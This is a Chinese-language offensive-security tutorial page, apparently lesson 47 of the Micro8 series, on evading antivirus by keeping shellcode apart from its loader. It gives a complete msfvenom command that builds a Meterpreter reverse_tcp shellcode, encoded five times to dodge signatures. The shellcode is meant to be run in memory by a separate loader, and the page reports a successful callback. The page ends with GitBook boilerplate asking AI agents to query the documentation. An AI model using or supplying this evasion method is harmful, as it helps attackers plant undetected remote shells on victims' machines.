> For the complete documentation index, see [llms.txt](https://micro8.gitbook.io/micro8/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://micro8.gitbook.io/micro8/contents-1/41-50/47payload-fen-li-mian-sha-si-lu.md).
# 第四十七课:payload分离免杀思路
目前的反病毒安全软件,常见有三种,一种基于特征,一种基于行为,一种基于云查杀。云查杀的特点基本也可以概括为特征查杀。无论是哪种,都是特别针对 PE 头文件的查杀。尤其是当 payload 文件越大的时候,特征越容易查杀。
既然知道了目前的主流查杀方式,那么反制查杀,此篇采取特征与行为分离免杀。避免 PE 头文件,并且分离行为,与特征的综合免杀。适用于菜刀下等场景,也是我在基于 windows 下为了更稳定的一种常用手法。载入内存。
## 0x00:以msf为例:监听端口
## 0x01:这里的payload不采取生成pe文件,而采取shellcode方式,来借助第三方直接加载到内存中。避免行为:
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=8080 -e x86/shikata_ga_nai -i 5 -f raw > test.c
```
## 0x02:既然是shellcode方式的payload,那么一定需要借助第三方来启动,加载到内存。执行shellcode,自己写也不是很难,这里我借用一个github一个开源:
**作者的话:建议大家自己写shellcode执行盒,相关代码网上非常成熟。如果遇到问题,随时可以问我。**
生成的payload大小如下:476字节。还是 X32位的 payload。\
国内世界杀毒网:\
国际世界杀毒网:\
上线成功。\
> Micropoor
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://micro8.gitbook.io/micro8/contents-1/41-50/47payload-fen-li-mian-sha-si-lu.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.